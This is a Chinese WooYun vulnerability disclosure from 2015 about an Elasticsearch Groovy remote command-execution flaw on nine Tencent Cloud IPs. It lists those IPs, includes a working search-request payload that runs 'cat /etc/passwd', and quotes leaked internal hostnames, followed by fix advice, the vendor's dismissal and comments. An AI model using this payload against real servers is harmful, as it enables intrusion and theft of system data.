当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099671

漏洞标题:腾讯云9个IP存在Elasticsearch Groovy命令执行漏洞

相关厂商:腾讯

漏洞作者: lijiejie

提交时间:2015-03-05 16:58

修复时间:2015-03-05 17:20

公开时间:2015-03-05 17:20

漏洞类型:命令执行

危害等级:低

自评Rank:3

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-05: 细节已通知厂商并且等待厂商处理中
2015-03-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

腾讯9个IP存在Elasticsearch Groovy命令执行漏洞,看了下,非腾讯自身业务,可能是腾讯云的客户

详细说明:

[Found] 203.195.148.250 is vulnerable!
[Found] 203.195.149.189 is vulnerable!
[Found] 203.195.151.221 is vulnerable!
[Found] 203.195.187.125 is vulnerable!
[Found] 203.195.194.168 is vulnerable!
[Found] 203.195.197.22 is vulnerable!
[Found] 203.195.197.82 is vulnerable!
[Found] 203.195.212.109 is vulnerable!
[Found] 203.195.234.184 is vulnerable!


漏洞证明:

看了几个都是root:

"#127.0.0.1\tTENCENT64.site TENCENT64", "10.143.86.204 damaster", "10.143.86.206 daslave0", "10.232.66.220 daslave1", "10.143.86.208 daslave2", "10.249.146.58 daslave3", "#10.249.173.82 daslave4", "#10.249.166.34 daslave5"


POST http://203.195.234.184:9200/_search?pretty
{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}


tencent_es.png

修复方案:

升级或配置script.groovy.sandbox.enabled: false
不绑定外网IP

版权声明:转载请注明来源 lijiejie@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-03-05 17:20

厂商回复:

非常感谢您的反馈,报告中反馈的问题并不属于腾讯业务。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-03-05 17:29 | hkAssassin ( 普通白帽子 | Rank:358 漏洞数:66 | 我是一只毛毛虫。)

    这是在扫全网么??

  2. 2015-03-06 09:41 | xxyyzz ( 实习白帽子 | Rank:57 漏洞数:6 | 123456)

    如何确认是谁的业务是个大问题?各位大牛是怎么做的?